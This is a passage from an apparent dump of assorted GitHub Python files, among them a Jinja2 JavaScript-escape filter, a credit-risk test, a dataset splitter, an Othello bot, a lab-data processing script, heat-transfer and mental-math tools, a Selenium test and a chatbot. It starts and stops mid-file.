iso-8859-15 -*-\nimport os.path\n\nimport jinja2\n\nfrom utils.utils import secondsFrom70s, getDelta\n\n\n# http://stackoverflow.com/a/18900930\n_js_escapes = {\n '\\\\': '\\\\u005C',\n '\\'': '\\\\u0027',\n '\"': '\\\\u0022',\n '>': '\\\\u003E',\n '<': '\\\\u003C',\n '&': '\\\\u0026',\n '=': '\\\\u003D',\n '-': '\\\\u002D',\n ';': '\\\\u003B',\n u'\\u2028': '\\\\u2028',\n u'\\u2029': '\\\\u2029'\n}\n# Escape every ASCII character with a value less than 32.\n_js_escapes.update(('%c' % z, '\\\\u%04X' % z) for z in xrange(32))\ndef jinja2_escapejs_filter(value):\n retval = []\n for letter in value:\n if _js_escapes.has_key(letter):\n retval.append(_js_escapes[letter])\n else:\n retval.append(letter)\n\n return jinja2.Markup(\"\".join(retval))\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(\n os.path.join(os.path.dirname(__file__), './templates/')\n )\n)\nJINJA_ENVIRONMENT.filters['from70s'] = secondsFrom70s\nJINJA_ENVIRONMENT.filters['delta'] = getDelta #\"\"\"\nJINJA_ENVIRONMENT.filters['escapejs'] = jinja2_escapejs_filter\n \nCHATS = {\n 'main': 'Global', \n 'book': 'Kirjat', \n 'games': 'Pelit' \n}","repo_name":"soakoak/PythonChat","sub_path":"src/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17760074302","text":"# %% [markdown]\n# Testing the functionality of Credit_Underwriter class, including visuals.\n#\n# Note: Yahoo finance only provides options data for US entities.\n\nfrom ins_mat.special.credit import risk, credit_module\n\nimport pandas as pd\nimport numpy as np\nimport yfinance as yf\nimport datetime as dt\n\n\ndef yf_risk_load(yf_ticker_name: str):\n '''\n Load specified risk tickers from yfinance library.\n '''\n ticker = yf.Ticker(yf_ticker_name)\n\n # Download 3 years of history\n end_date = dt.datetime.today()\n start_date = dt.datetime(year=end_date.year - 3, month=1, day=1)\n\n dload = ticker.history(start=start_date, end=end_date)\n\n # Balance sheet attributes for the risk\n try:\n assets = ticker.balance_sheet.loc['Current Assets'].iloc[0]\n liabilities = ticker.balance_sheet.loc['Current Debt'].iloc[0]\n except KeyError:\n assets = ticker.balance_sheet.loc['Total Assets'].iloc[0]\n liabilities = ticker.balance_sheet.loc['Total Debt'].iloc[0]\n shares_issued = ticker.balance_sheet.loc['Share Issued'].iloc[0]\n\n # Option prices (optimize for lowest volatility)\n options = pd.DataFrame()\n\n # Get expiry dates\n expiry_dates = ticker.options\n\n # Filter for expiry dates not immediate, so we look at least 1 month from now\n exp_date_filter = end_date + dt.timedelta(weeks=52/12)\n\n for T in expiry_dates:\n if dt.datetime.strptime(T, '%Y-%m-%d') < exp_date_filter:\n continue\n\n cur_T_options = ticker.option_chain(T)\n cur_T_options = pd.concat([cur_T_options.calls, cur_T_options.puts], ignore_index=True)\n cur_T_options['expiry'] = T\n options = pd.concat([options, cur_T_options], ignore_index=True)\n\n # Odd issue that yields wrong expiration dates so add 1 day to correct\n options['expiry'] = pd.to_datetime(options['expiry']) + dt.timedelta(days=1)\n options['duration'] = ((options['expiry']) - end_date).dt.days / 365\n\n # Labeling call and puts\n options['is_call'] = options['contractSymbol'].str[4:].apply(lambda symb: 'C' in symb)\n\n # Use the mid-point of price as strike, while also ensuring correct data-type for bid, as, strike\n options[['bid', 'ask', 'strike']] = options[['bid', 'ask', 'strike']].apply(pd.to_numeric)\n options['price'] = options[['bid', 'ask']].mean(axis=1)\n\n # Attain the option with the highest trade volume - measure of credibility\n options = options.sort_values(by='openInterest', ascending=False)\n\n # Obtain the option parameters\n opt_price = options['price'].iloc[0]\n opt_type = 'call' if options['is_call'].iloc[0] else 'put'\n opt_maturity = options['duration'].iloc[0]\n opt_strike = options['strike'].iloc[0]\n\n opt_implied = options['impliedVolatility'].iloc[0]\n\n yf_risk = risk(name=yf_ticker_name,\n ticker=yf_ticker_name,\n sector=ticker.info['sector'],\n shares_issued=shares_issued,\n market_history=dload['Close'].values,\n option_price=opt_price,\n option_strike=opt_strike,\n option_type=opt_type,\n option_maturity=opt_maturity,\n currency=ticker.info['currency'],\n assets=assets,\n liabilities=liabilities,\n dividends=dload['Dividends'].iloc[0]\n )\n\n return (yf_risk, opt_implied)\n\n\ndef credit_risk_generation(yf_risks, limit=10e6, debt_maturity=1, risk_free_rate=0.03, impl_vol_overriders=None):\n '''\n Run the credit risk pipeline from the chosen list of yf_risks.\n '''\n\n uw = credit_module(yf_risks, limit=limit, debt_maturity=debt_maturity, r=risk_free_rate)\n\n for i in range(len(yf_risks)):\n rsk = yf_risks[i]\n ovr = impl_vol_overriders[i]\n\n print(f'Solving for {rsk.name}')\n print('Attaining implied asset volatility...')\n uw.calculate_implied_volatility(rsk, override=ovr)\n\n print('Attaining sharpe ratio')\n uw.calculate_sharpe_ratio(rsk)\n\n print('Generating rates')\n uw.generate_rate(rsk, use_rn=False)\n\n return uw\n\n\ndef main_test():\n names = ['BAC', 'IBM', 'MSFT', 'ORCL', 'AAPL', 'PG', 'KO']\n portfolio_lst = []\n list_implied_vol = []\n\n for s in names:\n rsk, implV = yf_risk_load(s)\n portfolio_lst.append(rsk)\n list_implied_vol.append(implV)\n\n uw = credit_risk_generation(portfolio_lst, risk_free_rate=0.03, impl_vol_overriders=list_implied_vol)\n\n # Print some results:\n ac_probs = [uw.ac_default_probability[s] for s in names]\n rn_probs = [uw.rn_default_probability[s] for s in names]\n e_vols = [uw.equity_volatilities[s] for s in names]\n a_vols = [uw.asset_volatilities[s] for s in names]\n sharpe_ratios = [uw.sharpe_ratios[s] for s in names]\n prems = [uw.premiums[s] for s in names]\n\n results = pd.DataFrame({\n 'Risk': names,\n 'Implied_equity_volatility': e_vols,\n 'Implied_asset_volatility': a_vols,\n 'Default_probs_rn': rn_probs,\n 'Default_probs_act': ac_probs,\n 'Sharpe': sharpe_ratios,\n 'Premiums': prems\n })\n\n print(results)\n\n\nif __name__ == \"__main__\":\n main_test()\n","repo_name":"Alex-zh95/insurance-mathematics","sub_path":"ins_mat/tests/credit_test.py","file_name":"credit_test.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23115474420","text":"import os\nimport numpy as np\nimport shutil\n\nRATIO = 0.5\n\nprint(\"\\n ---- Dataset Split Started ---- \\n\")\n\nvehicle_list = os.listdir(os.path.join(os.getcwd(), \"images\"))\nimages_path = os.path.join(os.getcwd(), \"images\")\nmodel_images_path = os.path.join(os.getcwd(), \"classification_model/images\")\n\nif not os.path.isdir(model_images_path):\n os.mkdir(model_images_path)\n\nfor vehicle in vehicle_list:\n\n print(f\"Splitting the dataset of: {vehicle}\")\n\n os.makedirs(model_images_path + '/train/' + vehicle)\n os.makedirs(model_images_path + '/test/' + vehicle)\n os.makedirs(model_images_path + '/validate/' + vehicle)\n\n source = images_path + '/' + vehicle + '/duplicate_checked'\n\n if os.path.exists(source):\n allFileNames = os.listdir(source)\n else:\n continue\n\n np.random.shuffle(allFileNames)\n\n train_FileNames, remaining_FileNames = np.split(np.array(allFileNames),\n [int(len(allFileNames) * (1 - RATIO))])\n\n train_FileNames = [source+'/' + name for name in train_FileNames.tolist()]\n\n for name in train_FileNames:\n shutil.copy(name, model_images_path + '/train/' + vehicle)\n\n test_file_names, validate_file_names = np.split(np.array(remaining_FileNames),\n [int(len(remaining_FileNames) * (1 - RATIO))])\n\n test_file_names = [source+'/' + name for name in test_file_names.tolist()]\n validate_file_names = [source+'/' + name for name in validate_file_names.tolist()]\n\n for name in test_file_names:\n shutil.copy(name, model_images_path + '/test/' + vehicle)\n\n for name in validate_file_names:\n shutil.copy(name, model_images_path + '/validate/' + vehicle)\n\nprint(\"\\n ---- Dataset Split Completed ---- \")","repo_name":"donheshanthaka/Price-Finder-Deep-Learning-Model","sub_path":"web_scraper_for_image_collection/dataset_split.py","file_name":"dataset_split.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"4301113987","text":"import random\nimport sys\nsys.path.append('..')\nfrom common import board\n\n\ndef make_move(the_board, color):\n \"\"\"\n Returns a random move from the list of possible ones\n :return: (int, int)\n \"\"\"\n color = board.Board.WHITE if color == 'white' else board.Board.BLACK\n legal_moves = the_board.legal_moves(color)\n\n return random.choice(legal_moves) if len(legal_moves) > 0 else (-1, -1)\n\n\nif __name__ == '__main__':\n b = board.from_file(sys.argv[1])\n f = open('move.txt', 'w')\n f.write('%d,%d' % make_move(b, sys.argv[2]))\n f.close()\n","repo_name":"patrick-vieira/INF01048_T2_Othello","sub_path":"randomplayer/randomplayer.py","file_name":"randomplayer.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38447481807","text":"n = int(input())\nc = list(map(int, input().split()))\nc.sort()\nans = 1\nL = (10 ** 9 + 7)\nfor i, v in enumerate(c):\n ans *= (v - i) % L\n ans = ans % L\n\nprint(ans % L)\n","repo_name":"ET0024/AtCoder","sub_path":"ABC201~300/ABC209/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5572262652","text":"# -*- coding: utf-8 -*-\n# vim: sw=4:ts=4:expandtab\n\"\"\"\n pipe2py.modules.pipeurlbuilder\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n http://pipes.yahoo.com/pipes/docs?doc=url#URLBuilder\n\"\"\"\n\nimport urllib\nfrom itertools import imap, ifilter, starmap\nfrom . import _get_broadcast_funcs as get_funcs, get_dispatch_funcs, get_splits\nfrom pipe2py.lib import utils\nfrom pipe2py.lib.utils import combine_dicts as cdicts\n\nopts = {'parse': False}\n\n\n@utils.memoize(utils.timeout)\ndef parse_result(params, paths, base):\n url = '%s/' % base if not base.endswith('/') else base\n url += '/'.join(imap(str, ifilter(None, paths)))\n url = url.rstrip('/')\n url = utils.url_quote(url) # Ensure url is valid\n url += '?%s' % urllib.urlencode(params) if params and url else ''\n return url\n\n\ndef pipe_urlbuilder(context=None, _INPUT=None, conf=None, **kwargs):\n \"\"\"A url module that builds a url. Loopable.\n\n Parameters\n ----------\n context : pipe2py.Context object\n _INPUT : pipeforever pipe or an iterable of items or fields\n conf : {\n 'PARAM': [\n {'key': {'value': <'order'>}, 'value': {'value': <'desc'>}},\n {'key': {'value': <'page'>}, 'value': {'value': <'2'>}}\n ]\n 'PATH': {'type': 'text', 'value': <''>},\n 'BASE': {'type': 'text', 'value': <'http://site.com/feed.xml'>},\n }\n\n Yields\n ------\n _OUTPUT : url\n \"\"\"\n pkwargs = cdicts(opts, kwargs)\n get_params = get_funcs(conf.get('PARAM', []), **kwargs)[0]\n get_paths = get_funcs(conf.get('PATH', []), **pkwargs)[0]\n get_base = get_funcs(conf['BASE'], listize=False, **pkwargs)[0]\n parse_params = utils.parse_params\n splits = get_splits(_INPUT, funcs=[get_params, get_paths, get_base])\n parsed = utils.dispatch(splits, *get_dispatch_funcs('pass', parse_params))\n _OUTPUT = starmap(parse_result, parsed)\n return _OUTPUT\n","repo_name":"ggaughan/pipe2py","sub_path":"pipe2py/modules/pipeurlbuilder.py","file_name":"pipeurlbuilder.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"19"} +{"seq_id":"41928696795","text":"import re\n\nimport pandas as pd\nimport numpy as np\n\nfrom edc_pdutils import identity256\n\npattern = r'^[0-9]{4}[12]{1}[0-9]{4}$'\noptions = dict(na_rep='', encoding='utf8', index=True)\n\n\ndef vl_bcpp(result, quantifier):\n vl_bcpp = np.nan\n if pd.notnull(result):\n if (result <= 400 and quantifier == '<'):\n vl_bcpp = '< 400'\n elif (result < 10000 and quantifier in ['=', '>']):\n vl_bcpp = '< 10000'\n elif (result >= 10000 and quantifier in ['=', '>']):\n vl_bcpp = '>=10000'\n return vl_bcpp\n\n\ndef vl_result(value):\n pattern = r'[0-9]\\d+'\n vl_result = np.nan\n if pd.notnull(value):\n search = re.search(pattern, value)\n if search:\n vl_result = int(search.group())\n return vl_result\n\n\ndef vl_quantifier(value):\n pattern = r'[\\<\\>]{1}'\n vl_quantifier = np.nan\n if pd.notnull(vl_result(value)):\n vl_quantifier = '='\n search = re.search(pattern, value)\n if search:\n vl_quantifier = search.group()\n return vl_quantifier\n\n\ndef cd4_result(value):\n if pd.notnull(value) and not re.match('[A-Za-z]', value):\n cd4_result = int(round(float(value.strip()), 0))\n else:\n cd4_result = np.nan\n return cd4_result\n\n\ndef cd4_bcpp(cd4_result):\n cd4_bcpp = np.nan\n if pd.notnull(cd4_result):\n cd4_result = int(round(float(cd4_result), 0))\n if cd4_result < 500:\n cd4_bcpp = 'LO'\n elif cd4_result >= 500:\n cd4_bcpp = 'HI'\n return cd4_bcpp\n\n\n# demographics\nipms_demo = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-demographics.csv')\nipms_demo['identity'] = ipms_demo.apply(lambda row: np.nan if pd.isnull(row['UniquePublicIdentifier']) else str(\n row['UniquePublicIdentifier']).strip().replace('-', '').replace('_', ''), axis=1)\nipms_demo['art_initiation_date'] = pd.to_datetime(ipms_demo['ART_INIT_DATE'])\nipms_demo['valid_identity'] = ipms_demo[pd.notnull(\n ipms_demo['identity'])]['identity'].str.match(pattern)\nipms_demo['identity256'] = ipms_demo[ipms_demo['valid_identity'] ==\n True].apply(lambda row: identity256(row, 'identity'), axis=1)\n\n# lab results\nipms_lab = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-lab.csv')\nipms_lab['vl_result'] = ipms_lab.apply(\n lambda row: vl_result(row['VL_Result']), axis=1)\nipms_lab['vl_quantifier'] = ipms_lab.apply(\n lambda row: vl_quantifier(row['VL_Result']), axis=1)\nipms_lab['vl_bcpp'] = ipms_lab.apply(lambda row: vl_bcpp(\n row['vl_result'], row['vl_quantifier']), axis=1)\nipms_lab['vl_datetime'] = pd.to_datetime(ipms_lab['VL_Date'])\nipms_lab['cd4_datetime'] = pd.to_datetime(ipms_lab['CD4_Date'])\nipms_lab['cd4_result'] = ipms_lab.apply(\n lambda row: cd4_result(row['CD4_Result']), axis=1)\nipms_lab['cd4_bcpp'] = ipms_lab.apply(\n lambda row: cd4_bcpp(row['cd4_result']), axis=1)\n\n# visits\nipms_visits = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-clinic.csv', low_memory=False)\nipms_visits.loc[:, 'visit_datetime'] = pd.to_datetime(ipms_visits['VisitDate'])\n\n# merge\nipms = pd.merge(ipms_demo, ipms_lab, on='PatientID', how='left')\nipms = pd.merge(ipms, ipms_visits[[\n 'PatientID', 'VisitID', 'visit_datetime']], on='PatientID', how='left')\nipms.sort_values(['PatientID', 'visit_datetime'], inplace=True)\n\n# flag dups\nipms['dup_vl'] = ipms.duplicated(\n ['vl_datetime', 'identity256', 'vl_result', 'vl_quantifier'])\nipms['dup_cd4'] = ipms.duplicated(\n ['cd4_datetime', 'identity256', 'cd4_result'])\nipms['dup'] = ipms.duplicated(\n ['vl_datetime', 'cd4_datetime', 'identity256', 'cd4_result', 'vl_result'])\n\n# to csv\nipms.to_csv('/Users/erikvw/Documents/bcpp/nealia_ipms.csv', **options)\n\nipms = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/nealia_ipms.csv', low_memory=False)\n\ndf_subjects = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/nealia_subjects_with_pims6.csv', low_memory=False)\n\ndf = pd.merge(df_subjects, ipms.query('dup == False')[\n ['vl_datetime', 'LocationName', 'identity256', 'VL_Result']], how='left', on='identity256')\n","repo_name":"botswana-harvard/bcpp-rdb","sub_path":"bcpp_rdb/dataframes/ipms.py","file_name":"ipms.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34067884651","text":"import util\n\ndef go(db):\n print(\"subcategories in progress\")\n\n if db.has_collection('Subcategories'):\n db.delete_collection('Subcategories')\n subcategories_coll = db.create_collection('Subcategories')\n\n games_coll = db.collection(\"Games\")\n\n if db.has_collection('InSubCategory'):\n db.delete_collection('InSubCategory')\n in_sub_category_coll = db.create_collection('InSubCategory', edge=True)\n\n with open(\"../data/subcategories.csv\", \"r\", newline=\"\") as f:\n util.handle_adjacency_csv(f, db, games_coll, subcategories_coll, in_sub_category_coll)\n\nif __name__==\"__main__\":\n go(util.open_db())\n","repo_name":"torchipeppo/BDM-project","sub_path":"etl/subcategories.py","file_name":"subcategories.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38714324265","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 7 13:42:02 2019\n\n@author: thomas\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport openpnm as op\n\nplt.close('all')\nwrk = op.Workspace()\nspacing = 1e-5\nL = 9e-3\nNx = np.int(L / spacing) + 1\nnet = op.network.Cubic(shape=[Nx, 1, 1], spacing=spacing)\n# translate to origin\nnet['pore.coords'] -= np.array([spacing, spacing, spacing]) / 2\nnet.add_boundary_pores(labels=['left', 'right'], spacing=0.0)\n\ngeo = op.geometry.GenericGeometry(network=net, pores=net.Ps, throats=net.Ts)\ngeo['pore.diameter'] = spacing\ngeo['throat.diameter'] = spacing\ngeo['throat.length'] = spacing\ngeo['throat.area'] = (spacing)**2\ngeo['pore.area'] = (spacing)**2\ngeo['pore.volume'] = geo['pore.area'] * spacing\ngeo['throat.volume'] = 0.0\n\nT0 = 303\nK = 1\ncp = 1399\nrho = 2055\nalpha = K / (cp * rho)\nphase = op.phases.GenericPhase(network=net)\nphase['pore.conductivity'] = alpha\nphys = op.physics.GenericPhysics(network=net, geometry=geo, phase=phase)\nconc = 1.0 # mol/m^3\nphys['throat.conductance'] = conc * alpha * geo['throat.area'] / geo['throat.length']\n\nQ = 25000 / (cp * rho)\nheat_transfer_coefficient = 10\nhc = heat_transfer_coefficient / (cp * rho)\nbTs = net.throats('*boundary')\nphys['throat.conductance'][bTs] = hc * geo['throat.area'][bTs]\n\nPs_x = net['pore.coords'][:, 0]\nsource = Q * net['pore.volume']\nphys['pore.source.S1'] = 0.0\nphys['pore.source.S2'] = source\nphys['pore.source.rate'] = source\n\n\ndef run_transport(network, method='steady', t_initial=0,\n t_final=60 * 60 * 10, t_step=60, t_output=60):\n if method == 'steady':\n alg = op.algorithms.ReactiveTransport(network=network)\n alg.setup(\n phase=phase,\n quantity=\"pore.temperature\",\n conductance=\"throat.conductance\",\n rxn_tolerance=1e-12,\n relaxation_source=0.9,\n relaxation_quantity=0.9,\n )\n\n else:\n alg = op.algorithms.TransientReactiveTransport(network=network)\n alg.setup(phase=phase,\n conductance='throat.conductance',\n quantity='pore.temperature',\n t_initial=t_initial,\n t_final=t_final,\n t_step=t_step,\n t_output=t_output,\n t_tolerance=1e-9,\n t_precision=12,\n rxn_tolerance=1e-9,\n t_scheme='implicit')\n alg.set_IC(values=T0)\n\n BP = net.pores('pore.right_boundary')\n alg.set_value_BC(pores=BP, values=T0)\n Ps = net.pores('internal')\n alg.set_source(propname='pore.source', pores=Ps)\n alg.run()\n return alg\n\n\nalg = run_transport(network=net, method='transient')\nres = alg.results()\ntimes = list(res.keys())\nplt.figure()\ncenter = []\nmid = []\nmid_coord = int(Nx / 2)\nend = []\nfor time in times[1:]:\n data = alg[time]\n plt.plot(data)\n center.append(data[0])\n mid.append(data[mid_coord])\n end.append(data[-3])\nlast_time = float(time.split('@')[-1]) / (60 * 60)\n\nalg = run_transport(network=net, method='steady')\nplt.plot(alg['pore.temperature'], 'k--')\nhrs = np.linspace(0, last_time, len(center))\nplt.figure()\nplt.plot(hrs, center)\nplt.plot(hrs, mid)\nplt.plot(hrs, end)\n","repo_name":"TomTranter/pybamm_pnm","sub_path":"utility/pnm_transient_heat.py","file_name":"pnm_transient_heat.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"36465053933","text":"import win32com.client as wincl\r\nimport numpy as np\r\nimport time\r\nimport random\r\nspeak = wincl.Dispatch(\"Sapi.SpVoice\")\r\n\r\nspeak.Rate = .01\r\nvoices = speak.GetVoices()\r\n# for voice in voices:\r\n# print(voice.getDescription())\r\n\r\ndef two_by_two(lang = \"de\"):\r\n # set language\r\n if lang == \"en\":\r\n speak.Voice = voices[1]\r\n times = \"times\"\r\n elif lang == \"de\":\r\n speak.Voice = voices[0]\r\n times = \"mal\"\r\n else:\r\n raise Exception(\"Language needs to be either 'en' or 'de'!\")\r\n rand = np.random.randint(10,100,size=2)\r\n print()\r\n print(\" {} * {}\".format(rand[0], rand[1]))\r\n print()\r\n speak.Speak(\"{} {} {}\".format(rand[0], times, rand[1]))\r\n start = time.clock()\r\n input(\"Press for solution\")\r\n print()\r\n end = time.clock()\r\n print(\" {}\".format(rand[0]*rand[1]))\r\n speak.Speak(\"{}\".format(rand[0]*rand[1]))\r\n print()\r\n print(\"Time: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n\r\ndef three_by_one():\r\n left = np.random.randint(100,1000)\r\n right = np.random.randint(1,10) \r\n print()\r\n print(\" {} * {}\".format(left, right))\r\n print()\r\n speak.Speak(\"{} times {}\".format(left, right))\r\n start = time.clock()\r\n input(\"Press for solution\")\r\n print()\r\n end = time.clock()\r\n print(\" {}\".format(left*right))\r\n speak.Speak(\"{}\".format(left*right))\r\n print()\r\n print(\"Time: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n\t\r\ndef draw_operation_and_number():\r\n rand = np.random.randint(low = 10, high = 100, size = 1)\r\n operation = random.choice([0,1,1])\r\n print(operation)\r\n if operation:\r\n rand = \"plus \" + str(rand[0])\r\n else:\r\n rand = \"minus \" + str(rand[0])\r\n return(rand)\r\n\r\ndef run_training(numb_of_rounds):\r\n n = 0\r\n control = \"run\"\r\n count = 0\r\n while (n < numb_of_rounds) and (control == \"run\"):\r\n res = draw_operation_and_number()\r\n speak.Speak(res)\r\n if res.split()[0] == \"minus\":\r\n count = count - int(res.split()[1])\r\n else:\r\n count = count + int(res.split()[1])\r\n key = input(\"Want to stop? Press 0!\\nPress to continue!\")\r\n if key == 0:\r\n control = \"stop\"\r\n n += 1\r\n if (control == \"stop\") or (n == numb_of_rounds):\r\n print(\"Count is: {}\".format(count))\r\n return(count)\r\n\r\n \r\n#%%\r\nimport win32com.client as wincl\r\nimport numpy as np\r\nimport time\r\n# make mental math trainer class\r\nclass MM_trainer:\r\n def __init__(self):\r\n self.speak = wincl.Dispatch(\"Sapi.SpVoice\")\r\n self.speak.Rate = .01\r\n self.voices = self.speak.GetVoices()\r\n self.avg_time_sec = 0\r\n self.total_time_sec = 0\r\n self.n_questions = 0\r\n self.times = \"mal\"\r\n self.n_correct_questions = 0\r\n self.answer = None\r\n self.solution = None\r\n \r\n # get two by two question\r\n def two_by_two(self):\r\n rand = np.random.randint(10,100,size=2)\r\n self.solution = str(rand[0] * rand[1])\r\n print(\"\\n{} * {}\".format(rand[0], rand[1]))\r\n self.speak.Speak(\"{} {} {}\".format(rand[0], self.times, rand[1]))\r\n start = time.clock()\r\n self.answer = input(\"\\nEnter solution followed by \")\r\n end = time.clock()\r\n # check if answer is correct\r\n if self.solution == self.answer:\r\n print(\"\\nCorrect answer! Well done!\")\r\n self.speak.Speak(\"Korrekt, sehr gut, weiter so!\")\r\n self.n_correct_questions = self.n_correct_questions + 1\r\n else:\r\n print(\"\\nNot correct :(\")\r\n self.speak.Speak(\"Falsch, Brudi\")\r\n print(\"\\n{}\".format(rand[0] * rand[1]))\r\n self.speak.Speak(\"{}\".format(rand[0]*rand[1]))\r\n # update total time needed\r\n self.total_time_sec = self.total_time_sec + end - start\r\n # update number of questions\r\n self.n_questions = self.n_questions + 1\r\n # update average\r\n self.avg_time_sec = self.total_time_sec / self.n_questions\r\n # print results\r\n print(\"\\nTime: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n print(\"\\n--------\\nAvg Time: {} sec\".format(np.round(self.avg_time_sec, 1)))\r\n \r\n def set_language(self, lang = \"de\"):\r\n pass\r\n # self.speak.Voice = \r\n\r\n\r\n \r\n ","repo_name":"morchius/mental-math-trainer","sub_path":"mental_math_trainer.py","file_name":"mental_math_trainer.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32433271174","text":"import selenium\r\nfrom selenium.webdriver.common.by import By\r\nimport unittest\r\n### test made just to test clicks and to check the page response loaded properlly ###\r\n### i do not recomend to use selenium for api ###\r\n\r\nclass TestStatusCodes(unittest.TestCase):\r\n # the setUp and tearDown functions will repeat during all test process\r\n def setUp(self):\r\n self.driver = selenium.webdriver.Chrome()\r\n self.driver.get('https://the-internet.herokuapp.com')\r\n self.driver.set_window_size(1000, 750)\r\n self.driver.implicitly_wait(10)\r\n\r\n def tearDown(self):\r\n self.driver.quit()\r\n\r\n def test_download_secure(self):\r\n self.driver.find_element(By.LINK_TEXT, \"Redirect Link\").click()\r\n self.driver.find_element(By.LINK_TEXT, \"here\").click()\r\n # is it possible to pass the click action directly to the link text but will make it hard to assert\r\n code_500 = self.driver.find_element(By.LINK_TEXT, \"500\")\r\n code_500.click()\r\n # locate the new element that contains the status message\r\n status_page = self.driver.find_element(By.XPATH,\r\n \"//p[contains(text(),'This page returned a 500 status code.')]\")\r\n # assert to see if the loaded page has the correct message\r\n assert 'This page returned a 500 status code.' in status_page.text\r\n # use the .back() to go back one page\r\n self.driver.back()\r\n\r\n code_404 = self.driver.find_element(By.LINK_TEXT, \"404\")\r\n code_404.click()\r\n status_page = self.driver.find_element(By.XPATH,\r\n \"//p[contains(text(),'This page returned a 404 status code.')]\")\r\n assert 'This page returned a 404 status code.' in status_page.text\r\n self.driver.back()\r\n\r\n code_301 = self.driver.find_element(By.LINK_TEXT, \"301\")\r\n code_301.click()\r\n status_page = self.driver.find_element(By.XPATH,\r\n \"//p[contains(text(),'This page returned a 301 status code.')]\")\r\n assert 'This page returned a 301 status code.' in status_page.text\r\n self.driver.back()\r\n\r\n code_200 = self.driver.find_element(By.LINK_TEXT, \"200\")\r\n code_200.click()\r\n status_page = self.driver.find_element(By.XPATH,\r\n \"//p[contains(text(),'This page returned a 200 status code.')]\")\r\n assert 'This page returned a 200 status code.' in status_page.text\r\n self.driver.back()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"dbeniamin/Selenium_automation","sub_path":"status_codes_unittest.py","file_name":"status_codes_unittest.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14709420699","text":"import requests\nimport random\n\nclass Chatbot:\n\n nome_chatbot = 'DuChat'\n\n def __init__(self) -> None:\n pass\n\n def sequencia_fibonacci(self):\n n = int(input(\"Que termo deseja encontrar: \"))\n ultimo=1\n penultimo=1\n\n if (n==1) or (n==2):\n print(\"1\")\n else:\n for count in range(2,n):\n termo = ultimo + penultimo\n penultimo = ultimo\n ultimo = termo\n count += 1\n print(termo, end=' -> ')\n\n def descubra_seu_signo(self, dia, mes):\n if mes == 'dezembro':\n astro_sign = 'Sagittarius' if (dia < 22) else 'capricorn'\n elif mes == 'janeiro':\n astro_sign = 'Capricorn' if (dia < 20) else 'aquarius'\n elif mes == 'fevereiro':\n astro_sign = 'Aquarius' if (dia < 19) else 'pisces'\n elif mes == 'março':\n astro_sign = 'Pisces' if (dia < 21) else 'aries'\n elif mes == 'abril':\n astro_sign = 'Aries' if (dia < 20) else 'taurus'\n elif mes == 'maio':\n astro_sign = 'Taurus' if (dia < 21) else 'gemini'\n elif mes == 'junho':\n astro_sign = 'Gemini' if (dia < 21) else 'cancer'\n elif mes == 'julho':\n astro_sign = 'Cancer' if (dia < 23) else 'leo'\n elif mes == 'agosto':\n astro_sign = 'Leo' if (dia < 23) else 'virgo'\n elif mes == 'setembro':\n astro_sign = 'Virgo' if (dia < 23) else 'libra'\n elif mes == 'outubro':\n astro_sign = 'Libra' if (dia < 23) else 'scorpio'\n elif mes == 'novembro':\n astro_sign = 'scorpio' if (dia < 22) else 'sagittarius'\n print(astro_sign)\n\n def piada(self):\n piada = requests.get('https://geek-jokes.sameerkumar.website/api?format=json')\n print(piada.json()['joke'])\n\n def charada(self):\n charadas = {'pergunta': 'Sem sair do seu cantinho, é capaz de viajar ao redor do mundo.',\n 'resposta': 'selo', \n 'pergunta': 'É feito de água, mas se for colocado dentro da água morrerá.',\n 'resposta': 'gelo'\n }\n charada = input(f'O que é o que é? {random.choices(list(charadas.keys()))}')\n return charadas['resposta'] == charada\n \n def get_nome_chatbot(self):\n return self.nome_chatbot\n\ndef main():\n print('-='*20)\n print('\\n 1 = SEQUÊNCIA DE FIBONNACCI \\n 2 = DESCUBRA SEU SIGNO \\n 3 = DESCUBRA MEU NOME \\n 4 = PIADA \\n 5 = CHARADA')\n opcao = int(input('Como posso lhe ajudar? '))\n print('-='*20)\n\n chatbot = Chatbot()\n \n if opcao == 1:\n 